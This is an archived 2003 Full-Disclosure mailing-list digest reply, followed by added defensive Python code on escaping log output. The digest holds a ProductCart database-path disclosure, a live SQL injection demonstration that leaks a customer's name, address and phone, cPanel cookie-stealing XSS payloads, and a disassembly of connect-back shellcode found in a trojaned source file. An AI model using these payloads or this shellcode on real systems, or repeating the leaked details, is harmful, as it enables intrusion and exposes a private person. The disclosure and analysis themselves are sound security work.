Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs

From: security snot (booger_at_unixclan.net)
Date: 07/06/03

    To: Markus Nielsen <intercool@sexmagnet.com>
    Date: Sun, 6 Jul 2003 11:31:21 -0700 (PDT)
    
    

    Guys -

    Could we please limit the length of included replies on this list, to
    something sane? Quoting the entire thread is very annoying.

    Thanks.

    -----------------------------------------------------------
    "Whitehat by day, booger at night - I'm the security snot."
    - CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
    -----------------------------------------------------------

    On Sun, 6 Jul 2003, Markus Nielsen wrote:

    > On Sun, 2003-07-06 at 16:00, full-disclosure-request@lists.netsys.com
    > wrote:
    > > Send Full-Disclosure mailing list submissions to
    > > full-disclosure@lists.netsys.com
    > >
    > > To subscribe or unsubscribe via the World Wide Web, visit
    > > http://lists.netsys.com/mailman/listinfo/full-disclosure
    > > or, via email, send a message with subject or body 'help' to
    > > full-disclosure-request@lists.netsys.com
    > >
    > > You can reach the person managing the list at
    > > full-disclosure-admin@lists.netsys.com
    > >
    > > When replying, please edit your Subject line so it is more specific
    > > than "Re: Contents of Full-Disclosure digest..."
    > >
    > >
    > > Today's Topics:
    > >
    > > 1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
    > > 2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
    > > 3. Re: [Vulnerability] : ProductCart database file
    > > can be downloaded remotely (KF)
    > > 4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
    > > 5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
    > > 6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
    > > 7. Re: tripbid secure codes (Dave Korn)
    > > 8. Re: [Vulnerability] : ProductCart database file
    > > can be downloaded remotely (Larry W. Cashdollar)
    > > 9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)
    > >
    > > --__--__--
    > >
    > > Message: 1
    > > From: "Tri Huynh" <trihuynh@zeeup.com>
    > > To: <bugtraq@securityfocus.com>
    > > Cc: <full-disclosure@lists.netsys.com>
    > > Date: Sat, 5 Jul 2003 13:07:51 -0700
    > > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
    > >
    > > ProductCart database file can be downloaded remotely
    > > =================================================
    > >
    > > PROGRAM: ProductCart
    > > HOMEPAGE: http://www.earlyimpact.com/productcart/
    > > VULNERABLE VERSIONS: 1.0 to 2.0
    > > RISK: High
    > >
    > >
    > > DESCRIPTION
    > > =================================================
    > >
    > > ProductCart® is an ASP shopping cart that combines sophisticated
    > > ecommerce features with time-saving store management tools and remarkable
    > > ease of use. It is widely used by many e-commerce sites.
    > >
    > > DETAILS
    > > =================================================
    > >
    > > In the default installation, the ProductCart database file is located at
    > > /productcart/database/EIPC.mdb, where it can be accessed easily
    > > by any remote attacker.
    > >
    > > Sample: http://victimhost/productcart/database/EIPC.mdb
    > >
    > > The database file includes the store administration password as well as
    > > customers' info (including credit card info).
    > >
    > >
    > > WORKAROUND
    > > =================================================
    > >
    > > Rename the database file and put it in a protected directory.
    > >
    > >
    > > CREDITS
    > > =================================================
    > >
    > > Discovered by Tri Huynh from Sentry Union
    > >
    > >
    > > DISCLAIMER
    > > =================================================
    > >
    > > The information within this paper may change without notice. Use of
    > > this information constitutes acceptance for use in an AS IS condition.
    > > There are NO warranties with regard to this information. In no event
    > > shall the author be liable for any damages whatsoever arising out of
    > > or in connection with the use or spread of this information. Any use
    > > of this information is at the user's own risk.
    > >
    > >
    > > FEEDBACK
    > > =================================================
    > >
    > > Please send suggestions, updates, and comments to: trihuynh@zeeup.com
    > >
    > >
    > > --__--__--
    > >
    > > Message: 2
    > > From: gyrniff <b240503@gyrniff.dk>
    > > To: full-disclosure@lists.netsys.com
    > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
    > > Date: Sat, 5 Jul 2003 19:37:41 +0200
    > >
    > > URL:
    > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
    > > Change the name Paul to Paul'
    > >
    > > Microsoft OLE DB Provider for ODBC Drivers
    > > error '80040e14'
    > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
    > > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
    > > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
    > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
    > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
    > >
    > > have a nice weekend ;-)
    > >
    > >
    > >
    > > --__--__--
    > >
    > > Message: 3
    > > Date: Sat, 05 Jul 2003 15:30:28 -0400
    > > From: KF <dotslash@snosoft.com>
    > > To: gyrniff <b240503@gyrniff.dk>
    > > CC: full-disclosure@lists.netsys.com
    > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
    > > can be downloaded remotely
    > >
    > > Was that legit California data? I am sure that by making someone have a
    > > nice weekend you just made multiple someones have a shitty month ahead
    > > of them...
    > > http://www.theregister.co.uk/content/55/31509.html
    > >
    > > -KF
    > >
    > > gyrniff wrote:
    > >
    > > >URL:
    > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
    > > >Change the name Paul to Paul'
    > > >
    > > >Microsoft OLE DB Provider for ODBC Drivers
    > > > error '80040e14'
    > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
    > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
    > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
    > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
    > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
    > > >
    > > >have a nice weekend ;-)
    > > >
    > > >_______________________________________________
    > > >Full-Disclosure - We believe in it.
    > > >Charter: http://lists.netsys.com/full-disclosure-charter.html
    > > >
    > > >
    > > >
    > >
    > >
    > >
    > > --__--__--
    > >
    > > Message: 4
    > > From: "morning_wood" <se_cur_ity@hotmail.com>
    > > To: "gyrniff" <b240503@gyrniff.dk>, <full-disclosure@lists.netsys.com>
    > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
    > > Date: Sat, 5 Jul 2003 15:24:46 -0700
    > >
    > > vuln to XSS too..
    > >
    > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
    > >
    > > ----- Original Message -----
    > > From: "gyrniff" <b240503@gyrniff.dk>
    > > To: <full-disclosure@lists.netsys.com>
    > > Sent: Saturday, July 05, 2003 10:37 AM
    > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database
    > > file can be downloaded remotely
    > >
    > >
    > > > URL:
    > > >
    > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
    > > > Change the name Paul to Paul'
    > > >
    > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > error '80040e14'
    > > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing
    > > operator) in
    > > > query expression ''Paul'',lastName='Smith',customerCompany='Early
    > > Impact',
    > > > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
    > > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE
    > > idCustomer=115'.
    > > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp,
    > > line 36
    > > >
    > > > have a nice weekend ;-)
    > > >
    > > > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
    > > > > ProductCart database file can be downloaded remotely
    > > > > =================================================
    > > > >
    > > > > PROGRAM: ProductCart
    > > > > HOMEPAGE: http://www.earlyimpact.com/productcart/
    > > > > VULNERABLE VERSIONS: 1.0 to 2.0
    > > > > RISK: High
    > > > >
    > > > >
    > > > > DESCRIPTION
    > > > > =================================================
    > > > >
    > > > > ProductCart® is an ASP shopping cart that combines sophisticated
    > > > > ecommerce features with time-saving store management tools and
    > > remarkable
    > > > > ease of use. It is widely used by many e-commerce sites.
    > > > >
    > > > > DETAILS
    > > > > =================================================
    > > > >
    > > > > In the default installation, product cart database file is located
    > > at
    > > > > /productcart/database/EIPC.mdb which can be accessed easily
    > > > > by any remote attackers.
    > > > >
    > > > > Sample: http://victimhost/productcart/database/EIPC.mdb
    > > > >
    > > > > The database file includes the store administration password as
    > > well as
    > > > > customer's info (including credit card info).
    > > > >
    > > > >
    > > > > WORKAROUND
    > > > > =================================================
    > > > >
    > > > > Rename the database file, put it in a protected directory.
    > > > >
    > > > >
    > > > > CREDITS
    > > > > =================================================
    > > > >
    > > > > Discovered by Tri Huynh from Sentry Union
    > > > >
    > > > >
    > > > > DISLAIMER
    > > > > =================================================
    > > > >
    > > > > The information within this paper may change without notice. Use
    > > of
    > > > > this information constitutes acceptance for use in an AS IS
    > > condition.
    > > > > There are NO warranties with regard to this information. In no
    > > event
    > > > > shall the author be liable for any damages whatsoever arising out
    > > of
    > > > > or in connection with the use or spread of this information. Any
    > > use
    > > > > of this information is at the user's own risk.
    > > > >
    > > > >
    > > > > FEEDBACK
    > > > > =================================================
    > > > >
    > > > > Please send suggestions, updates, and comments to:
    > > trihuynh@zeeup.com
    > > >
    > > > _______________________________________________
    > > > Full-Disclosure - We believe in it.
    > > > Charter: http://lists.netsys.com/full-disclosure-charter.html
    > > >
    > >
    > > --__--__--
    > >
    > > Message: 5
    > > From: Ory Segal <ORY.SEGAL@SANCTUMINC.COM>
    > > To: "BugTraq (E-mail)" <BUGTRAQ@SECURITYFOCUS.COM>,
    > > "Full Disclosure (E-mail)" <full-disclosure@lists.netsys.com>,
    > > "WebAppSec (E-mail)" <webappsec@SECURITYFOCUS.COM>
    > > Date: Sun, 6 Jul 2003 01:39:33 -0700
    > > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
    > >
    > > ///////////////////////////////////////////////////////////////////////////////
    > > //==========================>> Security Advisory <<==========================//
    > > ///////////////////////////////////////////////////////////////////////////////
    > >
    > > -------------------------------------------------------------------------------
    > > -----[ cPanel Malicious HTML Tags Injection Vulnerability
    > > -------------------------------------------------------------------------------
    > >
    > > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
    > > --[ Discovery Date: 06/17/2003 (Vendor was notified)
    > > --[ Release Date: 07/06/2003
    > > --[ Product: Tested on cPanel 6.4.2-STABLE
    > > --[ Severity: Medium
    > > --[ CVE: Not assigned yet
    > >
    > > --[ Summary
    > >
    > > From the vendor's web site:
    > > "...The Cpanel interface is a client side interface, which allows your customers
    > > to easily control a web hosting account. With the touch of a button, they can
    > > add e-mail accounts, access their files, backup their files, setup a shopping
    > > cart, and more..."
    > >
    > > Web users can embed Malicious HTML tags in HTTP requests, which will later
    > > be parsed by the web site administrator's browser, in several cPanel screens.
    > > This may lead to theft of cookies associated with the domain, or execution of
    > > client-side scripts in the administrator's browser.
    > >
    > > --[ Description
    > >
    > > The 'Error Log' and 'Latest Visitors' screens in cPanel provide the web site
    > > administrator with HTTP request logs. These scripts do not sanitize the URL part
    > > of HTTP requests and present them to the administrator as is, thus allowing an
    > > attacker to embed malicious HTML tags that will later be parsed and executed by
    > > the administrator's browser.
    > >
    > > For example, let's take a look at the 'Error Log' screen:
    > >
    > > [From errlog.html]
    > > ...
    > > <b>Last 300 Error Log Messages in reverse order:</b><hr>
    > > <pre>
    > > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
    > > /home/dir/public_html/foobar.html
    > > </pre>
    > > ...
    > >
    > > The following request will present a pop-up screen with the cookies
    > > that are currently associated with the domain:
    > >
    > > GET /<script>alert(document.cookie);</script> HTTP/1.0
    > > Host: www.site.com
    > >
    > >
    > > --[ Note
    > >
    > > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the
    > > latest requests as HTML links, thus the malicious payload must terminate the <a>
    > > tag before opening a new one. For example:
    > >
    > > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
    > > Host: www.site.com
    > >
    > > --[ Solution
    > >
    > > According to the vendor, the problem was fixed in version 7.0, which can be
    > > downloaded at: http://www.cpanel.net/downloads.htm
    > >
    > >
    > >
    > >
    > > Ory Segal
    > > Senior Security Engineer
    > > Sanctum, Inc.
    > > http://www.SanctumInc.Com/
    > >
    > > Ampa Bldg., 1 Sapir Street.
    > > Mail: P.O.Box 12047
    > > Herzliya 46733, ISRAEL
    > >
    > > Tel: +972-9-9586077 Ext. 236
    > > Fax: +972-9-9576337
    > >
    > >
    > >
    > > --__--__--
    > >
    > > Message: 6
    > > Date: Sun, 06 Jul 2003 11:46:44 +0300
    > > From: Ory Segal <ory.segal@sanctuminc.com>
    > > To: BUGTRAQ@SECURITYFOCUS.COM, full-disclosure@lists.netsys.com,
    > > webappsec@SECURITYFOCUS.COM
    > > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
    > >
    > > -------------------------------------------------------------------------------
    > > -----[ cPanel Malicious HTML Tags Injection Vulnerability
    > > -------------------------------------------------------------------------------
    > >
    > > --[ Author: Ory Segal, Sanctum inc.
    http://www.SanctumInc.com
    > > --[ Discovery Date: 06/17/2003 (Vendor was notified)
    > > --[ Release Date: 07/06/2003
    > > --[ Product: Tested on cPanel 6.4.2-STABLE
    > > --[ Severity: Medium
    > > --[ CVE: Not assigned yet
    > >
    > > --[ Summary
    > >
    > > From the vendor's web site:
    > > "...The Cpanel interface is a client side interface, which allows your customers
    > > to easily control a web hosting account. With the touch of a button, they can
    > > add e-mail accounts, access their files, backup their files, setup a shopping
    > > cart, and more..."
    > >
    > > Web users can embed malicious HTML tags in HTTP requests, which will later
    > > be parsed by the web site administrator's browser, in several cPanel screens.
    > > This may lead to theft of cookies associated with the domain, or execution of
    > > client-side scripts in the administrator's browser.
    > >
    > > --[ Description
    > >
    > > The 'Error Log' and 'Latest Visitors' screens in cPanel provide the web site
    > > administrator with HTTP request logs. These scripts do not sanitize the URL part
    > > of HTTP requests and present them to the administrator as is, thus allowing an
    > > attacker to embed malicious HTML tags that will later be parsed and executed by
    > > the administrator's browser.
    > >
    > > For example, let's take a look at the 'Error Log' screen:
    > >
    > > [From errlog.html]
    > > ...
    > > <b>Last 300 Error Log Messages in reverse order:</b><hr>
    > > <pre>
    > > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
    > > /home/dir/public_html/foobar.html
    > > </pre>
    > > ...
    > >
    > > The following request will present a pop-up screen with the cookies
    > > that are currently associated with the domain:
    > >
    > > GET /<script>alert(document.cookie);</script> HTTP/1.0
    > > Host: www.site.com
    > >
    > >
    > > --[ Note
    > >
    > > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the
    > > latest requests as HTML links, thus the malicious payload must terminate the <a>
    > > tag before opening a new one. For example:
    > >
    > > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
    > > Host: www.site.com
    > >
    > > --[ Solution
    > >
    > > According to the vendor, the problem was fixed in version 7.0, which can be
    > > downloaded at: http://www.cpanel.net/downloads.htm
    > >
    > > --__--__--
    > >
    > > Message: 7
    > > From: "Dave Korn" <davek_throwaway@hotmail.com>
    > > To: full-disclosure@lists.netsys.com
    > > Subject: Re: [Full-Disclosure] tripbid secure codes
    > > Date: Sun, 06 Jul 2003 12:23:01 +0000
    > >
    > >
    > > ----- Original Message -----
    > > From: <auto94042@hushmail.com>
    > > To: <full-disclosure@lists.netsys.com>
    > > Sent: Friday, June 27, 2003 6:25 AM
    > > Subject: [Full-Disclosure] tripbid secure codes
    > >
    > >
    > > >i post the thing to the vuln dev some days ago and get quite a big
    > > >response.
    > > >not only do i get a heart 2 heart with n1xo reiman about portmon ! but
    > > >some folks want me to look at the code they make, specially a 'hello-
    > > >world.c' progie -> " holo, can you check my hello-world.c for strcpy
    > > >?? securecode do the trick " <- paraphrase the msg, i rm -rf / it since
    > > >it make me anger and stress it !
    > > >
    > > >i am willing to try the secure code since the grep 'strcpy' is losing
    > > >his thrills so i trick around with :
    > > >[user@localhost]$ ./securecode -s hello-world.c
    > >
    > >
    > > Never ever EVER run an insecure program over arbitrary data you receive from
    > > the net without checking it for safety first..... Let's look at this
    > > hello-world.c before we run anything on it....
    > >
    > >
    > > Z:\sploits-misc\targzip>type hello-world.c
    > >
    > >
    > > Heh. Boy, did j00 get hax0red! Here's what's actually in that file:
    > >
    > > $0000 - $00ff: 'A' x 256
    > > $0100 - $011f: DWORD $bffff321 x 8
    > > $0120 - $0378 $90 = NOP x 600
    > > $0378 - $03fa: Binary shellcode
    > > $03fb - $03fc: CR, LF
    > > <EOF>
    > >
    > > In other words, it's one very long line. Looks to me like the securecode
    > > program reads each line of the .c file into a buffer that's only 256 bytes
    > > long; this exploit fills it with 'A', then overwrites the return address on
    > > the stack with a pointer into the NOP slide. Here's a disassembly of the
    > > shellcode: note that offset 0 in this disassembly is offset $0370 in the
    > > file. Sorry for not commenting this, but I don't speak linux asm; however I
    > > can see a whole bunch of syscalls going on in there; the values in eax
    > > should tell you whether anything nastier than a few mkdirs was done to
    > > you...
    > >
    > > Z:\sploits-misc\targzip>objdump -D --target=binary hello-world2.bin --architecture=i386
    > >
    > > hello-world2.bin: file format binary
    > >
    > > objdump: hello-world2.bin: no symbols
    > > Disassembly of section .data:
    > >
    > > 00000000 <.data>:
    > > 0: 90 nop
    > > 1: 90 nop
    > > 2: 90 nop
    > > 3: 90 nop
    > > 4: 90 nop
    > > 5: 90 nop
    > > 6: 90 nop
    > > 7: 90 nop
    > > 8: 90 nop
    > > 9: 31 c0 xor %eax,%eax
    > > b: 31 db xor %ebx,%ebx
    > > d: 31 c9 xor %ecx,%ecx
    > > f: 51 push %ecx
    > > 10: b1 06 mov $0x6,%cl
    > > 12: 51 push %ecx
    > > 13: b1 01 mov $0x1,%cl
    > > 15: 51 push %ecx
    > > 16: b1 02 mov $0x2,%cl
    > > 18: 51 push %ecx
    > > 19: 89 e1 mov %esp,%ecx
    > > 1b: b3 01 mov $0x1,%bl
    > > 1d: b0 66 mov $0x66,%al
    > > 1f: cd 80 int $0x80
    > > 21: 89 c2 mov %eax,%edx
    > > 23: 31 c0 xor %eax,%eax
    > > 25: 31 c9 xor %ecx,%ecx
    > > 27: 51 push %ecx
    > > 28: 51 push %ecx
    > > 29: 68 d4 62 f7 cc push $0xccf762d4
    > > 2e: 66 68 b0 ef pushw $0xefb0
    > > 32: b1 02 mov $0x2,%cl
    > > 34: 66 51 push %cx
    > > 36: 89 e7 mov %esp,%edi
    > > 38: b3 10 mov $0x10,%bl
    > > 3a: 53 push %ebx
    > > 3b: 57 push %edi
    > > 3c: 52 push %edx
    > > 3d: 89 e1 mov %esp,%ecx
    > > 3f: b3 03 mov $0x3,%bl
    > > 41: b0 66 mov $0x66,%al
    > > 43: cd 80 int $0x80
    > > 45: 31 c9 xor %ecx,%ecx
    > > 47: 39 c1 cmp %eax,%ecx
    > > 49: 74 06 je 0x51
    > > 4b: 31 c0 xor %eax,%eax
    > > 4d: b0 01 mov $0x1,%al
    > > 4f: cd 80 int $0x80
    > > 51: 31 c0 xor %eax,%eax
    > > 53: b0 3f mov $0x3f,%al
    > > 55: 89 d3 mov %edx,%ebx
    > > 57: cd 80 int $0x80
    > > 59: 31 c0 xor %eax,%eax
    > > 5b: b0 3f mov $0x3f,%al
    > > 5d: 89 d3 mov %edx,%ebx
    > > 5f: b1 01 mov $0x1,%cl
    > > 61: cd 80 int $0x80
    > > 63: 31 c0 xor %eax,%eax
    > > 65: b0 3f mov $0x3f,%al
    > > 67: 89 d3 mov %edx,%ebx
    > > 69: b1 02 mov $0x2,%cl
    > > 6b: cd 80 int $0x80
    > > 6d: 31 c0 xor %eax,%eax
    > > 6f: 31 d2 xor %edx,%edx
    > > 71: 50 push %eax
    > > 72: 68 6e 2f 73 68 push $0x68732f6e
    > > 77: 68 2f 2f 62 69 push $0x69622f2f
    > > 7c: 89 e3 mov %esp,%ebx
    > > 7e: 50 push %eax
    > > 7f: 53 push %ebx
    > > 80: 89 e1 mov %esp,%ecx
    > > 82: b0 0b mov $0xb,%al
    > > 84: cd 80 int $0x80
    > > 86: 31 c0 xor %eax,%eax
    > > 88: b0 01 mov $0x1,%al
    > > 8a: cd 80 int $0x80
    > > 8c: 0d .byte 0xd
    > > 8d: 0a .byte 0xa
    > >
    > >
    > >
    > > DaveK
    > >
    > >
    > >
    > > --__--__--
    > >
    > > Message: 8
    > > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
    > > From: "Larry W. Cashdollar" <lwc@vapid.ath.cx>
    > > To: <full-disclosure@lists.netsys.com>
    > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
    > > can be downloaded remotely
    > >
    > >
    > >
    > > 949 is a legit zip code in cali.
    > >
    > >
    > > On Sat, 5 Jul 2003, KF wrote:
    > >
    > > > Was that legit California data? I am sure than making someone have a
    > > > nice weekend you just made multiple someones have a shitty month ahead
    > > > of them...
    > > > http://www.theregister.co.uk/content/55/31509.html
    > > >
    > > > -KF
    > > >
    > > > gyrniff wrote:
    > > >
    > > > >URL:
    > > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
    > > > >Change the name Paul to Paul'
    > > > >
    > > > >Microsoft OLE DB Provider for ODBC Drivers
    > > > > error '80040e14'
    > > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
    > > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
    > > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
    > > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
    > > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
    > > > >
    > > > >have a nice weekend ;-)
    > > > >
    > > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
    > > > >
    > > > >
    > > > >>ProductCart database file can be downloaded remotely
    > > > >>=================================================
    > > > >>
    > > > >>PROGRAM: ProductCart
    > > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
    > > > >>VULNERABLE VERSIONS: 1.0 to 2.0
    > > > >>RISK: High
    > > > >>
    > > > >>
    > > > >>DESCRIPTION
    > > > >>=================================================
    > > > >>
    > > > >>ProductCart® is an ASP shopping cart that combines sophisticated
    > > > >>ecommerce features with time-saving store management tools and remarkable
    > > > >>ease of use. It is widely used by many e-commerce sites.
    > > > >>
    > > > >>DETAILS
    > > > >>=================================================
    > > > >>
    > > > >>In the default installation, the ProductCart database file is located at
    > > > >>/productcart/database/EIPC.mdb, which can be accessed easily
    > > > >>by any remote attacker.
    > > > >>
    > > > >>Sample: http://victimhost/productcart/database/EIPC.mdb
    > > > >>
    > > > >>The database file includes the store administration password as well as
    > > > >>customer's info (including credit card info).
    > > > >>
    > > > >>
    > > > >> WORKAROUND
    > > > >>=================================================
    > > > >>
    > > > >>Rename the database file, put it in a protected directory.
    > > > >>
    > > > >>
    > > > >>CREDITS
    > > > >>=================================================
    > > > >>
    > > > >>Discovered by Tri Huynh from Sentry Union
    > > > >>
    > > > >>
    > > > >>DISCLAIMER
    > > > >>=================================================
    > > > >>
    > > > >>The information within this paper may change without notice. Use of
    > > > >>this information constitutes acceptance for use in an AS IS condition.
    > > > >>There are NO warranties with regard to this information. In no event
    > > > >>shall the author be liable for any damages whatsoever arising out of
    > > > >>or in connection with the use or spread of this information. Any use
    > > > >>of this information is at the user's own risk.
    > > > >>
    > > > >>
    > > > >>FEEDBACK
    > > > >>=================================================
    > > > >>
    > > > >>Please send suggestions, updates, and comments to: trihuynh@zeeup.com
    > > > >>
    > > > >>
    > > > >
    > > > >_______________________________________________
    > > > >Full-Disclosure - We believe in it.
    > > > >Charter: http://lists.netsys.com/full-disclosure-charter.html
    > > > >
    > > > >
    > > > >
    > > >
    > > >
    > > > _______________________________________________
    > > > Full-Disclosure - We believe in it.
    > > > Charter: http://lists.netsys.com/full-disclosure-charter.html
    > > >
    > >
    > >
    > > --__--__--
    > >
    > > Message: 9
    > > From: "Kristian Hermansen" <this_is_kris@hotmail.com>
    > > To: <full-disclosure@lists.netsys.com>
    > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
    > > Date: Tue, 1 Jul 2003 22:49:59 -0400
    > >
    > > Yes, programmers should be trained to write better code...but it is more
    > > profitable to allow sloppy code and a simple fix later (behind the scenes
    > > with vendor notification). This is MS's point of view. This is why they want
    > > vendor notification, rather than public notification. Again, I say let the
    > > 0-days fly.
    > >
    > > Did you know that certain US government agencies have teams whose only
    > > job is to break software? This has been going on since the 1970's. It
    > > helps to produce secure code in mission critical applications that the
    > > military needs. I am not saying that MS needs to be SO drastic...but a
    > > small team for their MOST popular products would sure be wise to start with.
    > > Why not hire fucking intern teenagers from Russia to "Crash Test" their
    > > development projects (facetious)? Would it be so difficult/expensive to
    > > hire some of the main companies that are breaking your software???
    > >
    > > Kris Hermansen
    > >
    > > ----- Original Message -----
    > > From: "Schmehl, Paul L" <pauls@utdallas.edu>
    > > To: <full-disclosure@lists.netsys.com>
    > > Sent: Tuesday, July 01, 2003 6:58 PM
    > > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again )
    > >
    > >
    > > > > -----Original Message-----
    > > > > From: Kristian Hermansen [mailto:this_is_kris@hotmail.com]
    > > > > Sent: Tuesday, July 01, 2003 3:09 PM
    > > > > To: full-disclosure@lists.netsys.com
    > > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
    > > > >
    > > > >
    > > > > I agree. It is not our problem. The reason is this.
    > > > > Microsoft would like to reduce costs. Fixing bugs in
    > > > > products costs money, and 0-day bugs need immediate fixes
    > > > > which slow down MS total output ability. They would like to
    > > > > see everyone reporting to the vendor first because this saves
    > > > > them money!!! In this respect, this also allows them to go on
    > > > > writing sloppy code in order to save a few bucks on every
    > > > > product, thus reducing their overhead. I don't want sloppy
    > > > > code. Let the 0-days fly....maybe MS will start doing
    > > > > extensive testing to their products before they release it
    > > > > for sale to millions of customers. I thought .NET was
    > > > > supposed to fix all this ;-P
    > > >
    > > > That's too funny. Microsoft ran a "buffer overflow finder" against the
    > > > codebase for XP, and the VP in charge announced publicly that they had
    > > > "eliminated buffer overflows in XP". Within thirty days, eEye announced
    > > > the UPnP vulnerability in SSDP, which is the single most devastating
    > > > hole ever found in MS products. (You can compromise an entire network
    > > > of XP machines with one attack, simultaneously.)
    > > >
    > > > You don't fix code by extensive testing. You fix it by teaching how to
    > > > write secure code to begin with *and* by ongoing, consistent audits done
    > > > before code is released. (OpenBSD has been doing this for years, and
    > > > look at the results.)
    > > >
    > > > Paul Schmehl (pauls@utdallas.edu)
    > > > Adjunct Information Security Officer
    > > > The University of Texas at Dallas
    > > > AVIEN Founding Member
    > > > http://www.utdallas.edu/~pauls/
    > > > _______________________________________________
    > > > Full-Disclosure - We believe in it.
    > > > Charter: http://lists.netsys.com/full-disclosure-charter.html
    > > >
    > >
    > >
    > > --__--__--
    > >
    > > _______________________________________________
    > > Full-Disclosure mailing list
    > > Full-Disclosure@lists.netsys.com
    > > http://lists.netsys.com/mailman/listinfo/full-disclosure
    > >
    > >
    > > End of Full-Disclosure Digest
    > --
    > Markus Nielsen <intercool@sexmagnet.com>
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
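The cPanel advisory quoted above (Message 6) comes down to one mistake: request URLs written into the 'Error Log' and 'Latest Visitors' pages without output encoding. As an added illustration, not cPanel's code or the advisory author's, the Python below renders constructed error-log lines the vulnerable way and with context-appropriate encoding, and adds a triage check a defender could run over the raw log; the function names and log entries are mine.

```python
# Added example (not cPanel's code): log viewer XSS, vulnerable vs. encoded output.
import html
import re
from urllib.parse import quote

# Constructed Apache error-log entries in the shape the advisory quotes:
# one ordinary 404 and two whose request path carries the advisory's payloads.
ERROR_LOG = [
    "[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/foobar.html",
    "[Tue Jun 17 08:42:02 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/<script>alert(document.cookie);</script>",
    '[Tue Jun 17 08:43:55 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/"></a><script>alert(document.cookie);</script>',
]


def render_errlog_vulnerable(lines):
    """errlog.html as the advisory describes it: raw log text dropped into <pre>."""
    return "<pre>\n" + "\n".join(lines) + "\n</pre>"


def render_errlog_fixed(lines):
    """Same screen, but every log line is HTML-encoded before it reaches the page."""
    return "<pre>\n" + "\n".join(html.escape(line, quote=True) for line in lines) + "\n</pre>"


def render_visitor_link_vulnerable(path):
    """'Latest Visitors' style: the request path becomes an <a> with no encoding."""
    return '<a href="%s">%s</a>' % (path, path)


def render_visitor_link_fixed(path):
    """Attribute context gets URL-encoding, text context gets HTML-encoding."""
    return '<a href="%s">%s</a>' % (quote(path, safe="/?=&"), html.escape(path, quote=True))


SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)
META_CHARS = re.compile(r'[<>"\']')


def contains_live_script(rendered_html):
    """True if a real <script> tag survived into the output (the symptom the advisory reports)."""
    return SCRIPT_TAG.search(rendered_html) is not None


def flag_suspicious_requests(lines):
    """Triage over the raw log: (line_no, path) for entries whose path carries HTML metacharacters."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = re.search(r"File does not exist: (\S.*)$", line)
        if m and META_CHARS.search(m.group(1)):
            hits.append((number, m.group(1)))
    return hits
```

The fixed link renderer shows why the advisory's second payload has to close the `<a>` first: once the attribute is URL-encoded and the text is HTML-encoded, neither context can be broken out of.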

